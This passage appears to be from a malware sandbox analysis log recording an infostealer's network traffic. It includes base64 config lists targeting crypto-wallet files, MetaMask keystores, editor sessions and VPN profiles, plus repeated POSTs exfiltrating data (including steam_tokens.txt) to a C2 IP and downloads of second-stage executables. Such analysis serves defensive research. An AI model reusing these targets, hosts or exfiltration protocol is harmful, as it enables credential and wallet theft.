6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU1GS
Apr 25, 2024 12:16:24.512305975 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:24.850079060 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:24.912343979 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:25.255924940 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:25.262176991 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:25.600677013 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:25.609329939 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIJECAEGDHIDHJKKKKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:25.949424982 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:25.964724064 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:26.302692890 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:26.312505007 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:26.679919004 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:26.725496054 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:27.065701962 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:27.076003075 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:27.419558048 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:27.472321033 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:27.813419104 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:27.883192062 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:28.221465111 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:28.231173992 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:28.584301949 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:28.594553947 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:28.945864916 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:28.952122927 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:29.309519053 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:29.321590900 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:29.660671949 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:29.671185970 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:30.017827034 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:30.062016964 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:30.407159090 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:30.439109087 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:30.777544022 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:30.818865061 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:31.166743994 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:31.187300920 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:31.528331041 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:31.564481974 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:31.903533936 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:31.929779053 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:32.275702000 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:32.375819921 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:32.718815088 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:32.765034914 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:33.108268023 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:34.095798969 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:34.441186905 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:34.591403008 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDA Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="file"------BKJDGCGDAAAKECAKKJDA--
Apr 25, 2024 12:16:34.927774906 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:35.361582994 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB Host: 185.172.128.76 Content-Length: 125787 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:36.090719938 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:36.272716045 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBKJKJKKJDGDGDGIDG Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 2d 2d 0d 0a Data Ascii: ------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="message"her7h48r------GHDBKJKJKKJDGDGDGIDG--
Apr 25, 2024 12:16:36.609616041 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	185.172.128.228	80	7056	C:\Users\user\Desktop\R0hb7jyBcv.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:14.334283113 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 12:16:14.541873932 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 10:16:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 